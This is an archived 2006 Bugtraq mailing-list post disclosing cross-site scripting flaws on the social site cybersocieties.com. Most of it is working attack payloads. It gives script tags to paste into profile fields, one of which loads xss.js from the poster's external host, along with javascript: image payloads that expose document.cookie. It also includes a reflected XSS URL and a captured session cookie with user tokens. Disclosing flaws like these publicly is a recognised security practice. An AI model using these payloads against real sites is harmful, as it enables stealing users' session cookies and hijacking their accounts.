lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC | |
Open Source and information security mailing list archives
| ||
|
Message-ID: <20060612223039.2206.qmail@securityfocus.com> Date: 12 Jun 2006 22:30:39 -0000 From: luny@...fucktard.com To: bugtraq@...urityfocus.com Subject: Cybersocieties.com - XSS & cookie disclosure Cybersocieties.com Homepage: http://www.cybersocieties.com Effected files: * Input boxes in profile: - Full name box - Occupation box - MSN box - Yahoo box - AIM Box * Viewing a profile ------------------------------------------------------ XSS vuln via input boxes in profile: No filter evasion is needed. For PoC try putting the following codesin one of theboxes mentioned above: <SCRIPT SRC=http://youfucktard.com/xss.js></SCRIPT> or: <IMG SRC=javascript:alert('XSS')> or: <IMG SRC="javascript:document.write(document.cookie)"> etc Screenshots: http://www.youfucktard.com/xsp/cyberso1.jpg http://www.youfucktard.com/xsp/cyberso2.jpg http://www.youfucktard.com/xsp/cyberso3.jpg Our Cookie: This is remote text via xss.js located at youfucktard.com CFTOKEN=544ABB96-138B-14A6-ADAD1496630F53D7; CFID=436305; USERID=28506 -------------------------------------------------------- Viewing a profile XSS vuln PoC: http://www.cybersocieties.com/index.cfm?fractal=bsw.dsp.home.main&UserID=28506&tab=3">">">">">'><SCRIPT></SCRIPT><BR><BR><IMG%20SRC=javascript:alert('XSS')><"<"<"<"<""><"<' Screenshot: http://www.youfucktard.com/xsp/cyberso4.jpg